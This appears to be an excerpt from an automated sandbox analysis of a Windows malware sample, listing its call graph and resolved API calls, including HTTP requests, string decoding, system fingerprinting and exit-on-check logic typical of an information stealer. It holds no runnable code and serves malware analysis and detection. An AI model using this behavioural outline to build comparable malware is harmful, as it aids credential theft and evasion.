38030->38031 38032 112bff 38031->38032 38033 114610 2 API calls 38032->38033 38034 112c18 38033->38034 38035 114610 2 API calls 38034->38035 38036 112c31 38035->38036 38037 114610 2 API calls 38036->38037 38038 112c4a 38037->38038 38039 114610 2 API calls 38038->38039 38040 112c63 38039->38040 38041 114610 2 API calls 38040->38041 38042 112c7c 38041->38042 38043 114610 2 API calls 38042->38043 38044 112c95 38043->38044 38045 114610 2 API calls 38044->38045 38046 112cae 38045->38046 38047 114610 2 API calls 38046->38047 38048 112cc7 38047->38048 38049 114610 2 API calls 38048->38049 38050 112ce0 38049->38050 38051 114610 2 API calls 38050->38051 38052 112cf9 38051->38052 38053 114610 2 API calls 38052->38053 38054 112d12 38053->38054 38055 114610 2 API calls 38054->38055 38056 112d2b 38055->38056 38057 114610 2 API calls 38056->38057 38058 112d44 38057->38058 38059 114610 2 API calls 38058->38059 38060 112d5d 38059->38060 38061 114610 2 API calls 38060->38061 38062 112d76 38061->38062 38063 114610 2 API calls 38062->38063 38064 112d8f 38063->38064 38065 114610 2 API calls 38064->38065 38066 112da8 38065->38066 38067 114610 2 API calls 38066->38067 38068 112dc1 38067->38068 38069 114610 2 API calls 38068->38069 38070 112dda 38069->38070 38071 114610 2 API calls 38070->38071 38072 112df3 38071->38072 38073 114610 2 API calls 38072->38073 38074 112e0c 38073->38074 38075 114610 2 API calls 38074->38075 38076 112e25 38075->38076 38077 114610 2 API calls 38076->38077 38078 112e3e 38077->38078 38079 114610 2 API calls 38078->38079 38080 112e57 38079->38080 38081 114610 2 API calls 38080->38081 38082 112e70 38081->38082 38083 114610 2 API calls 38082->38083 38084 112e89 38083->38084 38085 114610 2 API calls 38084->38085 38086 112ea2 38085->38086 38087 114610 2 API calls 38086->38087 38088 112ebb 38087->38088 38089 114610 2 API calls 38088->38089 38090 112ed4 38089->38090 38091 114610 2 API calls 38090->38091 38092 112eed 38091->38092 38093 114610 2 API calls 38092->38093 38094 112f06 38093->38094 38095 114610 2 API calls 38094->38095 38096 112f1f 38095->38096 38097 114610 2 API calls 38096->38097 38098 112f38 38097->38098 38099 114610 2 API calls 38098->38099 38100 112f51 38099->38100 38101 114610 2 API calls 38100->38101 38102 112f6a 38101->38102 38103 114610 2 API calls 38102->38103 38104 112f83 38103->38104 38105 114610 2 API calls 38104->38105 38106 112f9c 38105->38106 38107 114610 2 API calls 38106->38107 38108 112fb5 38107->38108 38109 114610 2 API calls 38108->38109 38110 112fce 38109->38110 38111 114610 2 API calls 38110->38111 38112 112fe7 38111->38112 38113 114610 2 API calls 38112->38113 38114 113000 38113->38114 38115 114610 2 API calls 38114->38115 38116 113019 38115->38116 38117 114610 2 API calls 38116->38117 38118 113032 38117->38118 38119 114610 2 API calls 38118->38119 38120 11304b 38119->38120 38121 114610 2 API calls 38120->38121 38122 113064 38121->38122 38123 114610 2 API calls 38122->38123 38124 11307d 38123->38124 38125 114610 2 API calls 38124->38125 38126 113096 38125->38126 38127 114610 2 API calls 38126->38127 38128 1130af 38127->38128 38129 114610 2 API calls 38128->38129 38130 1130c8 38129->38130 38131 114610 2 API calls 38130->38131 38132 1130e1 38131->38132 38133 114610 2 API calls 38132->38133 38134 1130fa 38133->38134 38135 114610 2 API calls 38134->38135 38136 113113 38135->38136 38137 114610 2 API calls 38136->38137 38138 11312c 38137->38138 38139 114610 2 API calls 38138->38139 38140 113145 38139->38140 38141 114610 2 API calls 38140->38141 38142 11315e 38141->38142 38143 114610 2 API calls 38142->38143 38144 113177 38143->38144 38145 114610 2 API calls 38144->38145 38146 113190 38145->38146 38147 114610 2 API calls 38146->38147 38148 1131a9 38147->38148 38149 114610 2 API calls 38148->38149 38150 1131c2 38149->38150 38151 114610 2 API calls 38150->38151 38152 1131db 38151->38152 38153 114610 2 API calls 38152->38153 38154 1131f4 38153->38154 38155 114610 2 API calls 38154->38155 38156 11320d 38155->38156 38157 114610 2 API calls 38156->38157 38158 113226 38157->38158 38159 114610 2 API calls 38158->38159 38160 11323f 38159->38160 38161 114610 2 API calls 38160->38161 38162 113258 38161->38162 38163 114610 2 API calls 38162->38163 38164 113271 38163->38164 38165 114610 2 API calls 38164->38165 38166 11328a 38165->38166 38167 114610 2 API calls 38166->38167 38168 1132a3 38167->38168 38169 114610 2 API calls 38168->38169 38170 1132bc 38169->38170 38171 114610 2 API calls 38170->38171 38172 1132d5 38171->38172 38173 114610 2 API calls 38172->38173 38174 1132ee 38173->38174 38175 114610 2 API calls 38174->38175 38176 113307 38175->38176 38177 114610 2 API calls 38176->38177 38178 113320 38177->38178 38179 114610 2 API calls 38178->38179 38180 113339 38179->38180 38181 114610 2 API calls 38180->38181 38182 113352 38181->38182 38183 114610 2 API calls 38182->38183 38184 11336b 38183->38184 38185 114610 2 API calls 38184->38185 38186 113384 38185->38186 38187 114610 2 API calls 38186->38187 38188 11339d 38187->38188 38189 114610 2 API calls 38188->38189 38190 1133b6 38189->38190 38191 114610 2 API calls 38190->38191 38192 1133cf 38191->38192 38193 114610 2 API calls 38192->38193 38194 1133e8 38193->38194 38195 114610 2 API calls 38194->38195 38196 113401 38195->38196 38197 114610 2 API calls 38196->38197 38198 11341a 38197->38198 38199 114610 2 API calls 38198->38199 38200 113433 38199->38200 38201 114610 2 API calls 38200->38201 38202 11344c 38201->38202 38203 114610 2 API calls 38202->38203 38204 113465 38203->38204 38205 114610 2 API calls 38204->38205 38206 11347e 38205->38206 38207 114610 2 API calls 38206->38207 38208 113497 38207->38208 38209 114610 2 API calls 38208->38209 38210 1134b0 38209->38210 38211 114610 2 API calls 38210->38211 38212 1134c9 38211->38212 38213 114610 2 API calls 38212->38213 38214 1134e2 38213->38214 38215 114610 2 API calls 38214->38215 38216 1134fb 38215->38216 38217 114610 2 API calls 38216->38217 38218 113514 38217->38218 38219 114610 2 API calls 38218->38219 38220 11352d 38219->38220 38221 114610 2 API calls 38220->38221 38222 113546 38221->38222 38223 114610 2 API calls 38222->38223 38224 11355f 38223->38224 38225 114610 2 API calls 38224->38225 38226 113578 38225->38226 38227 114610 2 API calls 38226->38227 38228 113591 38227->38228 38229 114610 2 API calls 38228->38229 38230 1135aa 38229->38230 38231 114610 2 API calls 38230->38231 38232 1135c3 38231->38232 38233 114610 2 API calls 38232->38233 38234 1135dc 38233->38234 38235 114610 2 API calls 38234->38235 38236 1135f5 38235->38236 38237 114610 2 API calls 38236->38237 38238 11360e 38237->38238 38239 114610 2 API calls 38238->38239 38240 113627 38239->38240 38241 114610 2 API calls 38240->38241 38242 113640 38241->38242 38243 114610 2 API calls 38242->38243 38244 113659 38243->38244 38245 114610 2 API calls 38244->38245 38246 113672 38245->38246 38247 114610 2 API calls 38246->38247 38248 11368b 38247->38248 38249 114610 2 API calls 38248->38249 38250 1136a4 38249->38250 38251 114610 2 API calls 38250->38251 38252 1136bd 38251->38252 38253 114610 2 API calls 38252->38253 38254 1136d6 38253->38254 38255 114610 2 API calls 38254->38255 38256 1136ef 38255->38256 38257 114610 2 API calls 38256->38257 38258 113708 38257->38258 38259 114610 2 API calls 38258->38259 38260 113721 38259->38260 38261 114610 2 API calls 38260->38261 38262 11373a 38261->38262 38263 114610 2 API calls 38262->38263 38264 113753 38263->38264 38265 114610 2 API calls 38264->38265 38266 11376c 38265->38266 38267 114610 2 API calls 38266->38267 38268 113785 38267->38268 38269 114610 2 API calls 38268->38269 38270 11379e 38269->38270 38271 114610 2 API calls 38270->38271 38272 1137b7 38271->38272 38273 114610 2 API calls 38272->38273 38274 1137d0 38273->38274 38275 114610 2 API calls 38274->38275 38276 1137e9 38275->38276 38277 114610 2 API calls 38276->38277 38278 113802 38277->38278 38279 114610 2 API calls 38278->38279 38280 11381b 38279->38280 38281 114610 2 API calls 38280->38281 38282 113834 38281->38282 38283 114610 2 API calls 38282->38283 38284 11384d 38283->38284 38285 114610 2 API calls 38284->38285 38286 113866 38285->38286 38287 114610 2 API calls 38286->38287 38288 11387f 38287->38288 38289 114610 2 API calls 38288->38289 38290 113898 38289->38290 38291 114610 2 API calls 38290->38291 38292 1138b1 38291->38292 38293 114610 2 API calls 38292->38293 38294 1138ca 38293->38294 38295 114610 2 API calls 38294->38295 38296 1138e3 38295->38296 38297 114610 2 API calls 38296->38297 38298 1138fc 38297->38298 38299 114610 2 API calls 38298->38299 38300 113915 38299->38300 38301 114610 2 API calls 38300->38301 38302 11392e 38301->38302 38303 114610 2 API calls 38302->38303 38304 113947 38303->38304 38305 114610 2 API calls 38304->38305 38306 113960 38305->38306 38307 114610 2 API calls 38306->38307 38308 113979 38307->38308 38309 114610 2 API calls 38308->38309 38310 113992 38309->38310 38311 114610 2 API calls 38310->38311 38312 1139ab 38311->38312 38313 114610 2 API calls 38312->38313 38314 1139c4 38313->38314 38315 114610 2 API calls 38314->38315 38316 1139dd 38315->38316 38317 114610 2 API calls 38316->38317 38318 1139f6 38317->38318 38319 114610 2 API calls 38318->38319 38320 113a0f 38319->38320 38321 114610 2 API calls 38320->38321 38322 113a28 38321->38322 38323 114610 2 API calls 38322->38323 38324 113a41 38323->38324 38325 114610 2 API calls 38324->38325 38326 113a5a 38325->38326 38327 114610 2 API calls 38326->38327 38328 113a73 38327->38328 38329 114610 2 API calls 38328->38329 38330 113a8c 38329->38330 38331 114610 2 API calls 38330->38331 38332 113aa5 38331->38332 38333 114610 2 API calls 38332->38333 38334 113abe 38333->38334 38335 114610 2 API calls 38334->38335 38336 113ad7 38335->38336 38337 114610 2 API calls 38336->38337 38338 113af0 38337->38338 38339 114610 2 API calls 38338->38339 38340 113b09 38339->38340 38341 114610 2 API calls 38340->38341 38342 113b22 38341->38342 38343 114610 2 API calls 38342->38343 38344 113b3b 38343->38344 38345 114610 2 API calls 38344->38345 38346 113b54 38345->38346 38347 114610 2 API calls 38346->38347 38348 113b6d 38347->38348 38349 114610 2 API calls 38348->38349 38350 113b86 38349->38350 38351 114610 2 API calls 38350->38351 38352 113b9f 38351->38352 38353 114610 2 API calls 38352->38353 38354 113bb8 38353->38354 38355 114610 2 API calls 38354->38355 38356 113bd1 38355->38356 38357 114610 2 API calls 38356->38357 38358 113bea 38357->38358 38359 114610 2 API calls 38358->38359 38360 113c03 38359->38360 38361 114610 2 API calls 38360->38361 38362 113c1c 38361->38362 38363 114610 2 API calls 38362->38363 38364 113c35 38363->38364 38365 114610 2 API calls 38364->38365 38366 113c4e 38365->38366 38367 114610 2 API calls 38366->38367 38368 113c67 38367->38368 38369 114610 2 API calls 38368->38369 38370 113c80 38369->38370 38371 114610 2 API calls 38370->38371 38372 113c99 38371->38372 38373 114610 2 API calls 38372->38373 38374 113cb2 38373->38374 38375 114610 2 API calls 38374->38375 38376 113ccb 38375->38376 38377 114610 2 API calls 38376->38377 38378 113ce4 38377->38378 38379 114610 2 API calls 38378->38379 38380 113cfd 38379->38380 38381 114610 2 API calls 38380->38381 38382 113d16 38381->38382 38383 114610 2 API calls 38382->38383 38384 113d2f 38383->38384 38385 114610 2 API calls 38384->38385 38386 113d48 38385->38386 38387 114610 2 API calls 38386->38387 38388 113d61 38387->38388 38389 114610 2 API calls 38388->38389 38390 113d7a 38389->38390 38391 114610 2 API calls 38390->38391 38392 113d93 38391->38392 38393 114610 2 API calls 38392->38393 38394 113dac 38393->38394 38395 114610 2 API calls 38394->38395 38396 113dc5 38395->38396 38397 114610 2 API calls 38396->38397 38398 113dde 38397->38398 38399 114610 2 API calls 38398->38399 38400 113df7 38399->38400 38401 114610 2 API calls 38400->38401 38402 113e10 38401->38402 38403 114610 2 API calls 38402->38403 38404 113e29 38403->38404 38405 114610 2 API calls 38404->38405 38406 113e42 38405->38406 38407 114610 2 API calls 38406->38407 38408 113e5b 38407->38408 38409 114610 2 API calls 38408->38409 38410 113e74 38409->38410 38411 114610 2 API calls 38410->38411 38412 113e8d 38411->38412 38413 114610 2 API calls 38412->38413 38414 113ea6 38413->38414 38415 114610 2 API calls 38414->38415 38416 113ebf 38415->38416 38417 114610 2 API calls 38416->38417 38418 113ed8 38417->38418 38419 114610 2 API calls 38418->38419 38420 113ef1 38419->38420 38421 114610 2 API calls 38420->38421 38422 113f0a 38421->38422 38423 114610 2 API calls 38422->38423 38424 113f23 38423->38424 38425 114610 2 API calls 38424->38425 38426 113f3c 38425->38426 38427 114610 2 API calls 38426->38427 38428 113f55 38427->38428 38429 114610 2 API calls 38428->38429 38430 113f6e 38429->38430 38431 114610 2 API calls 38430->38431 38432 113f87 38431->38432 38433 114610 2 API calls 38432->38433 38434 113fa0 38433->38434 38435 114610 2 API calls 38434->38435 38436 113fb9 38435->38436 38437 114610 2 API calls 38436->38437 38438 113fd2 38437->38438 38439 114610 2 API calls 38438->38439 38440 113feb 38439->38440 38441 114610 2 API calls 38440->38441 38442 114004 38441->38442 38443 114610 2 API calls 38442->38443 38444 11401d 38443->38444 38445 114610 2 API calls 38444->38445 38446 114036 38445->38446 38447 114610 2 API calls 38446->38447 38448 11404f 38447->38448 38449 114610 2 API calls 38448->38449 38450 114068 38449->38450 38451 114610 2 API calls 38450->38451 38452 114081 38451->38452 38453 114610 2 API calls 38452->38453 38454 11409a 38453->38454 38455 114610 2 API calls 38454->38455 38456 1140b3 38455->38456 38457 114610 2 API calls 38456->38457 38458 1140cc 38457->38458 38459 114610 2 API calls 38458->38459 38460 1140e5 38459->38460 38461 114610 2 API calls 38460->38461 38462 1140fe 38461->38462 38463 114610 2 API calls 38462->38463 38464 114117 38463->38464 38465 114610 2 API calls 38464->38465 38466 114130 38465->38466 38467 114610 2 API calls 38466->38467 38468 114149 38467->38468 38469 114610 2 API calls 38468->38469 38470 114162 38469->38470 38471 114610 2 API calls 38470->38471 38472 11417b 38471->38472 38473 114610 2 API calls 38472->38473 38474 114194 38473->38474 38475 114610 2 API calls 38474->38475 38476 1141ad 38475->38476 38477 114610 2 API calls 38476->38477 38478 1141c6 38477->38478 38479 114610 2 API calls 38478->38479 38480 1141df 38479->38480 38481 114610 2 API calls 38480->38481 38482 1141f8 38481->38482 38483 114610 2 API calls 38482->38483 38484 114211 38483->38484 38485 114610 2 API calls 38484->38485 38486 11422a 38485->38486 38487 114610 2 API calls 38486->38487 38488 114243 38487->38488 38489 114610 2 API calls 38488->38489 38490 11425c 38489->38490 38491 114610 2 API calls 38490->38491 38492 114275 38491->38492 38493 114610 2 API calls 38492->38493 38494 11428e 38493->38494 38495 114610 2 API calls 38494->38495 38496 1142a7 38495->38496 38497 114610 2 API calls 38496->38497 38498 1142c0 38497->38498 38499 114610 2 API calls 38498->38499 38500 1142d9 38499->38500 38501 114610 2 API calls 38500->38501 38502 1142f2 38501->38502 38503 114610 2 API calls 38502->38503 38504 11430b 38503->38504 38505 114610 2 API calls 38504->38505 38506 114324 38505->38506 38507 114610 2 API calls 38506->38507 38508 11433d 38507->38508 38509 114610 2 API calls 38508->38509 38510 114356 38509->38510 38511 114610 2 API calls 38510->38511 38512 11436f 38511->38512 38513 114610 2 API calls 38512->38513 38514 114388 38513->38514 38515 114610 2 API calls 38514->38515 38516 1143a1 38515->38516 38517 114610 2 API calls 38516->38517 38518 1143ba 38517->38518 38519 114610 2 API calls 38518->38519 38520 1143d3 38519->38520 38521 114610 2 API calls 38520->38521 38522 1143ec 38521->38522 38523 114610 2 API calls 38522->38523 38524 114405 38523->38524 38525 114610 2 API calls 38524->38525 38526 11441e 38525->38526 38527 114610 2 API calls 38526->38527 38528 114437 38527->38528 38529 114610 2 API calls 38528->38529 38530 114450 38529->38530 38531 114610 2 API calls 38530->38531 38532 114469 38531->38532 38533 114610 2 API calls 38532->38533 38534 114482 38533->38534 38535 114610 2 API calls 38534->38535 38536 11449b 38535->38536 38537 114610 2 API calls 38536->38537 38538 1144b4 38537->38538 38539 114610 2 API calls 38538->38539 38540 1144cd 38539->38540 38541 114610 2 API calls 38540->38541 38542 1144e6 38541->38542 38543 114610 2 API calls 38542->38543 38544 1144ff 38543->38544 38545 114610 2 API calls 38544->38545 38546 114518 38545->38546 38547 114610 2 API calls 38546->38547 38548 114531 38547->38548 38549 114610 2 API calls 38548->38549 38550 11454a 38549->38550 38551 114610 2 API calls 38550->38551 38552 114563 38551->38552 38553 114610 2 API calls 38552->38553 38554 11457c 38553->38554 38555 114610 2 API calls 38554->38555 38556 114595 38555->38556 38557 114610 2 API calls 38556->38557 38558 1145ae 38557->38558 38559 114610 2 API calls 38558->38559 38560 1145c7 38559->38560 38561 114610 2 API calls 38560->38561 38562 1145e0 38561->38562 38563 114610 2 API calls 38562->38563 38564 1145f9 38563->38564 38565 129f20 38564->38565 38566 129f30 43 API calls 38565->38566 38567 12a346 8 API calls 38565->38567 38566->38567 38568 12a456 38567->38568 38569 12a3dc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38567->38569 38570 12a463 8 API calls 38568->38570 38571 12a526 38568->38571 38569->38568 38570->38571 38572 12a5a8 38571->38572 38573 12a52f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38571->38573 38574 12a647 38572->38574 38575 12a5b5 6 API calls 38572->38575 38573->38572 38576 12a654 9 API calls 38574->38576 38577 12a72f 38574->38577 38575->38574 38576->38577 38578 12a7b2 38577->38578 38579 12a738 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38577->38579 38580 12a7bb GetProcAddress GetProcAddress 38578->38580 38581 12a7ec 38578->38581 38579->38578 38580->38581 38582 12a825 38581->38582 38583 12a7f5 GetProcAddress GetProcAddress 38581->38583 38584 12a922 38582->38584 38585 12a832 10 API calls 38582->38585 38583->38582 38586 12a92b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38584->38586 38587 12a98d 38584->38587 38585->38584 38586->38587 38588 12a996 GetProcAddress 38587->38588 38589 12a9ae 38587->38589 38588->38589 38590 12a9b7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38589->38590 38591 125ef3 38589->38591 38590->38591 38592 111590 38591->38592 38862 1116b0 38592->38862 38595 12aab0 lstrcpy 38596 1115b5 38595->38596 38597 12aab0 lstrcpy 38596->38597 38598 1115c7 38597->38598 38599 12aab0 lstrcpy 38598->38599 38600 1115d9 38599->38600 38601 12aab0 lstrcpy 38600->38601 38602 111663 38601->38602 38603 125760 38602->38603 38604 125771 38603->38604 38605 12ab30 2 API calls 38604->38605 38606 12577e 38605->38606 38607 12ab30 2 API calls 38606->38607 38608 12578b 38607->38608 38609 12ab30 2 API calls 38608->38609 38610 125798 38609->38610 38611 12aa50 lstrcpy 38610->38611 38612 1257a5 38611->38612 38613 12aa50 lstrcpy 38612->38613 38614 1257b2 38613->38614 38615 12aa50 lstrcpy 38614->38615 38616 1257bf 38615->38616 38617 12aa50 lstrcpy 38616->38617 38639 1257cc 38617->38639 38618 125893 StrCmpCA 38618->38639 38619 1258f0 StrCmpCA 38620 125a2c 38619->38620 38619->38639 38621 12abb0 lstrcpy 38620->38621 38622 125a38 38621->38622 38623 12ab30 2 API calls 38622->38623 38625 125a46 38623->38625 38624 12ab30 lstrlen lstrcpy 38624->38639 38627 12ab30 2 API calls 38625->38627 38626 125aa6 StrCmpCA 38628 125be1 38626->38628 38626->38639 38633 125a55 38627->38633 38632 12abb0 lstrcpy 38628->38632 38629 12aa50 lstrcpy 38629->38639 38630 12aab0 lstrcpy 38630->38639 38631 12abb0 lstrcpy 38631->38639 38634 125bed 38632->38634 38635 1116b0 lstrcpy 38633->38635 38636 12ab30 2 API calls 38634->38636 38657 125a61 38635->38657 38637 125bfb 38636->38637 38640 12ab30 2 API calls 38637->38640 38638 125c5b StrCmpCA 38641 125c66 Sleep 38638->38641 38642 125c78 38638->38642 38639->38618 38639->38619 38639->38624 38639->38626 38639->38629 38639->38630 38639->38631 38639->38638 38645 111590 lstrcpy 38639->38645 38650 125510 25 API calls 38639->38650 38653 1259da StrCmpCA 38639->38653 38655 125b8f StrCmpCA 38639->38655 38656 125440 20 API calls 38639->38656 38643 125c0a 38640->38643 38641->38639 38644 12abb0 lstrcpy 38642->38644 38646 1116b0 lstrcpy 38643->38646 38647 125c84 38644->38647 38645->38639 38646->38657 38648 12ab30 2 API calls 38647->38648 38649 125c93 38648->38649 38651 12ab30 2 API calls 38649->38651 38650->38639 38652 125ca2 38651->38652 38654 1116b0 lstrcpy 38652->38654 38653->38639 38654->38657 38655->38639 38656->38639 38657->37710 38659 1276e3 GetVolumeInformationA 38658->38659 38660 1276dc 38658->38660 38664 127721 38659->38664 38660->38659 38661 12778c GetProcessHeap RtlAllocateHeap 38662 1277b8 wsprintfA 38661->38662 38663 1277a9 38661->38663 38666 12aa50 lstrcpy 38662->38666 38665 12aa50 lstrcpy 38663->38665 38664->38661 38667 125ff7 38665->38667 38666->38667 38667->37731 38669 12aab0 lstrcpy 38668->38669 38670 1148e9 38669->38670 38871 114800 38670->38871 38672 1148f5 38673 12aa50 lstrcpy 38672->38673 38674 114927 38673->38674 38675 12aa50 lstrcpy 38674->38675 38676 114934 38675->38676 38677 12aa50 lstrcpy 38676->38677 38678 114941 38677->38678 38679 12aa50 lstrcpy 38678->38679 38680 11494e 38679->38680 38681 12aa50 lstrcpy 38680->38681 38682 11495b InternetOpenA StrCmpCA 38681->38682 38683 114994 38682->38683 38684 114f1b InternetCloseHandle 38683->38684 38877 128cf0 38683->38877 38686 114f38 38684->38686 38892 11a210 CryptStringToBinaryA 38686->38892 38687 1149b3 38885 12ac30 38687->38885 38690 1149c6 38692 12abb0 lstrcpy 38690->38692 38698 1149cf 38692->38698 38693 12ab30 2 API calls 38694 114f55 38693->38694 38695 12acc0 4 API calls 38694->38695 38697 114f6b 38695->38697 38696 114f77 codecvt 38700 12aab0 lstrcpy 38696->38700 38699 12abb0 lstrcpy 38697->38699 38701 12acc0 4 API calls 38698->38701 38699->38696 38713 114fa7 38700->38713 38702 1149f9 38701->38702 38703 12abb0 lstrcpy 38702->38703 38704 114a02 38703->38704 38705 12acc0 4 API calls 38704->38705 38706 114a21 38705->38706 38707 12abb0 lstrcpy 38706->38707 38708 114a2a 38707->38708 38709 12ac30 3 API calls 38708->38709 38710 114a48 38709->38710 38711 12abb0 lstrcpy 38710->38711 38712 114a51 38711->38712 38714 12acc0 4 API calls 38712->38714 38713->37734 38715 114a70 38714->38715 38716 12abb0 lstrcpy 38715->38716 38717 114a79 38716->38717 38718 12acc0 4 API calls 38717->38718 38719 114a98 38718->38719 38720 12abb0 lstrcpy 38719->38720 38721 114aa1 38720->38721 38722 12acc0 4 API calls 38721->38722 38723 114acd 38722->38723 38724 12ac30 3 API calls 38723->38724 38725 114ad4 38724->38725 38726 12abb0 lstrcpy 38725->38726 38727 114add 38726->38727 38728 114af3 InternetConnectA 38727->38728 38728->38684 38729 114b23 HttpOpenRequestA 38728->38729 38731 114b78 38729->38731 38732 114f0e InternetCloseHandle 38729->38732 38733 12acc0 4 API calls 38731->38733 38732->38684 38734 114b8c 38733->38734 38735 12abb0 lstrcpy 38734->38735 38736 114b95 38735->38736 38737 12ac30 3 API calls 38736->38737 38738 114bb3 38737->38738 38739 12abb0 lstrcpy 38738->38739 38740 114bbc 38739->38740 38741 12acc0 4 API calls 38740->38741 38742 114bdb 38741->38742 38743 12abb0 lstrcpy 38742->38743 38744 114be4 38743->38744 38745 12acc0 4 API calls 38744->38745 38746 114c05 38745->38746 38747 12abb0 lstrcpy 38746->38747 38748 114c0e 38747->38748 38749 12acc0 4 API calls 38748->38749 38750 114c2e 38749->38750 38751 12abb0 lstrcpy 38750->38751 38752 114c37 38751->38752 38753 12acc0 4 API calls 38752->38753 38754 114c56 38753->38754 38755 12abb0 lstrcpy 38754->38755 38756 114c5f 38755->38756 38757 12ac30 3 API calls 38756->38757 38758 114c7d 38757->38758 38759 12abb0 lstrcpy 38758->38759 38760 114c86 38759->38760 38761 12acc0 4 API calls 38760->38761 38762 114ca5 38761->38762 38763 12abb0 lstrcpy 38762->38763 38764 114cae 38763->38764 38765 12acc0 4 API calls 38764->38765 38766 114ccd 38765->38766 38767 12abb0 lstrcpy 38766->38767 38768 114cd6 38767->38768 38769 12ac30 3 API calls 38768->38769 38770 114cf4 38769->38770 38771 12abb0 lstrcpy 38770->38771 38772 114cfd 38771->38772 38773 12acc0 4 API calls 38772->38773 38774 114d1c 38773->38774 38775 12abb0 lstrcpy 38774->38775 38776 114d25 38775->38776 38777 12acc0 4 API calls 38776->38777 38778 114d46 38777->38778 38779 12abb0 lstrcpy 38778->38779 38780 114d4f 38779->38780 38781 12acc0 4 API calls 38780->38781 38782 114d6f 38781->38782 38783 12abb0 lstrcpy 38782->38783 38784 114d78 38783->38784 38785 12acc0 4 API calls 38784->38785 38786 114d97 38785->38786 38787 12abb0 lstrcpy 38786->38787 38788 114da0 38787->38788 38789 12ac30 3 API calls 38788->38789 38790 114dbe 38789->38790 38791 12abb0 lstrcpy 38790->38791 38792 114dc7 38791->38792 38793 12aa50 lstrcpy 38792->38793 38794 114de2 38793->38794 38795 12ac30 3 API calls 38794->38795 38796 114e03 38795->38796 38797 12ac30 3 API calls 38796->38797 38798 114e0a 38797->38798 38799 12abb0 lstrcpy 38798->38799 38800 114e16 38799->38800 38801 114e37 lstrlen 38800->38801 38802 114e4a 38801->38802 38803 114e53 lstrlen 38802->38803 38891 12ade0 38803->38891 38805 114e63 HttpSendRequestA 38806 114e82 InternetReadFile 38805->38806 38807 114eb7 InternetCloseHandle 38806->38807 38812 114eae 38806->38812 38810 12ab10 38807->38810 38809 12acc0 4 API calls 38809->38812 38810->38732 38811 12abb0 lstrcpy 38811->38812 38812->38806 38812->38807 38812->38809 38812->38811 38898 12ade0 38813->38898 38815 121a14 StrCmpCA 38816 121a1f ExitProcess 38815->38816 38827 121a27 38815->38827 38817 121c12 38817->37736 38818 121b1f StrCmpCA 38818->38827 38819 121afd StrCmpCA 38819->38827 38820 121b82 StrCmpCA 38820->38827 38821 121b63 StrCmpCA 38821->38827 38822 121bc0 StrCmpCA 38822->38827 38823 121b41 StrCmpCA 38823->38827 38824 121ba1 StrCmpCA 38824->38827 38825 121acf StrCmpCA 38825->38827 38826 121aad StrCmpCA 38826->38827 38827->38817 38827->38818 38827->38819 38827->38820 38827->38821 38827->38822 38827->38823 38827->38824 38827->38825 38827->38826 38828 12ab30 lstrlen lstrcpy 38827->38828 38828->38827 38829->37742 38830->37744 38831->37750 38832->37752 38833->37758 38834->37760 38835->37764 38836->37768 38837->37772 38838->37778 38839->37780 38840->37784 38841->37798 38842->37802 38843->37801 38844->37797 38845->37801 38846->37816 38847->37839 38848->37805 38849->37809 38850->37828 38851->37835 38852->37844 38853->37826 38854->37829 38855->37854 38856->37859 38857->37858 38858->37855 38859->37858 38860->37868 38863 12aab0 lstrcpy 38862->38863 38864 1116c3 38863->38864 38865 12aab0 lstrcpy 38864->38865 38866 1116d5 38865->38866 38867 12aab0 lstrcpy 38866->38867 38868 1116e7 38867->38868 38869 12aab0 lstrcpy 38868->38869 38870 1115a3 38869->38870 38870->38595 38872 114816 38871->38872 38873 114888 lstrlen 38872->38873 38897 12ade0 38873->38897 38875 114898 InternetCrackUrlA 38876 1148b7 38875->38876 38876->38672 38878 12aa50 lstrcpy 38877->38878 38879 128d04 38878->38879 38880 12aa50 lstrcpy 38879->38880 38881 128d12 GetSystemTime 38880->38881 38883 128d29 38881->38883 38882 12aab0 lstrcpy 38884 128d8c 38882->38884 38883->38882 38884->38687 38887 12ac41 38885->38887 38886 12ac98 38888 12aab0 lstrcpy 38886->38888 38887->38886 38889 12ac78 lstrcpy lstrcat 38887->38889 38890 12aca4 38888->38890 38889->38886 38890->38690 38891->38805 38893 11a249 LocalAlloc 38892->38893 38894 114f3e 38892->38894 38893->38894 38895 11a264 CryptStringToBinaryA 38893->38895 38894->38693 38894->38696 38895->38894 38896 11a289 LocalFree 38895->38896 38896->38894 38897->38875 38898->38815

                                      Executed Functions

                                      Function 00129BB0 Relevance: 65.0, APIs: 33, Strings: 4, Instructions: 212libraryloaderCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 660 129bb0-129bc4 call 129aa0 663 129de3-129e42 LoadLibraryA * 5 660->663 664 129bca-129dde call 129ad0 GetProcAddress * 21 660->664 666 129e44-129e58 GetProcAddress 663->666 667 129e5d-129e64 663->667 664->663 666->667 669 129e96-129e9d 667->669 670 129e66-129e91 GetProcAddress * 2 667->670 671 129eb8-129ebf 669->671 672 129e9f-129eb3 GetProcAddress 669->672 670->669 673 129ec1-129ed4 GetProcAddress 671->673 674 129ed9-129ee0 671->674 672->671 673->674 675 129ee2-129f0c GetProcAddress * 2 674->675 676 129f11-129f12 674->676 675->676
                                      APIs
                                      • GetProcAddress.KERNEL32(76210000,00E31660), ref: 00129BF1
                                      • GetProcAddress.KERNEL32(76210000,00E31768), ref: 00129C0A
                                      • GetProcAddress.KERNEL32(76210000,00E31588), ref: 00129C22
                                      • GetProcAddress.KERNEL32(76210000,00E31708), ref: 00129C3A
                                      • GetProcAddress.KERNEL32(76210000,00E315A0), ref: 00129C53
                                      • GetProcAddress.KERNEL32(76210000,00E39250), ref: 00129C6B
                                      • GetProcAddress.KERNEL32(76210000,00E266F8), ref: 00129C83
                                      • GetProcAddress.KERNEL32(76210000,00E26678), ref: 00129C9C
                                      • GetProcAddress.KERNEL32(76210000,00E316D8), ref: 00129CB4
                                      • GetProcAddress.KERNEL32(76210000,00E31618), ref: 00129CCC
                                      • GetProcAddress.KERNEL32(76210000,00E31648), ref: 00129CE5
                                      • GetProcAddress.KERNEL32(76210000,00E31678), ref: 00129CFD
                                      • GetProcAddress.KERNEL32(76210000,00E26818), ref: 00129D15
                                      • GetProcAddress.KERNEL32(76210000,00E316F0), ref: 00129D2E
                                      • GetProcAddress.KERNEL32(76210000,00E31720), ref: 00129D46
